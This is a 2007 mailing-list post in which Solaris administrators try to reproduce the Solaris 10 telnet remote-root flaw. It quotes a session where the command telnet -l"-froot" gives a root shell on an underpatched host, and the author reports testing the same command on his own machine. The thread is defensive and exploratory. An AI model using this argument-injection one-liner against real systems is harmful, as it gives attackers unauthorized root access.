[geeks] Solaris 10 Remote-Root Exploit
Lionel Peterson
lionel4287 at verizon.net
Mon Feb 12 12:00:37 CST 2007
>From: Dave K <davek08054 at gmail.com>
>Date: 2007/02/12 Mon AM 11:43:44 CST
>To: The Geeks List <geeks at sunhelp.org>
>Subject: Re: [geeks] Solaris 10 Remote-Root Exploit
>On 2/12/07, Lionel Peterson <lionel4287 at verizon.net> wrote:
>> Just a few datapoints - anyone recreate this yet?
>
>Got this with an internal-only (and admittadly under patched) system:
>
>randomlinuxbox$ telnet -l"-froot" randomsunbox
>Trying 172.19.xxx.yyy...
>Connected to randomsunbox.
>Escape character is '^]'.
>Last login: Wed Nov 1 11:00:19 from randomlinuxbox
>Sun Microsystems Inc. SunOS 5.10 Generic January 2005
># uname -a
>SunOS randomsunbox 5.10 Generic_118822-25 sun4u sparc SUNW,UltraAX-i2
># exit
>Connection closed by foreign host.
>
>I'm not the person responsible for that system, so I'm not sure what
>the full configuration is.
I log into a sun ultra 10, Solaris 10 Update 2, otherwise stock, and do the following:
telnet -l"-froot" 127.0.0.1
Which should get me into my own box, right? Well, I get connected, told the escape character and then have the connection closed as I am not on the system console (but no password request)...
I CAN telent in as myself onto the same box, that is the only test possible, until I build up a clean box (which I will do later today - I am curious about this 'exploit")...
I'll post results of a clean build after I test the various combinations.
Lionel
I REALLY think you have to enable "telnet as root" for this problem to manifest itself...
More information about the geeks
mailing list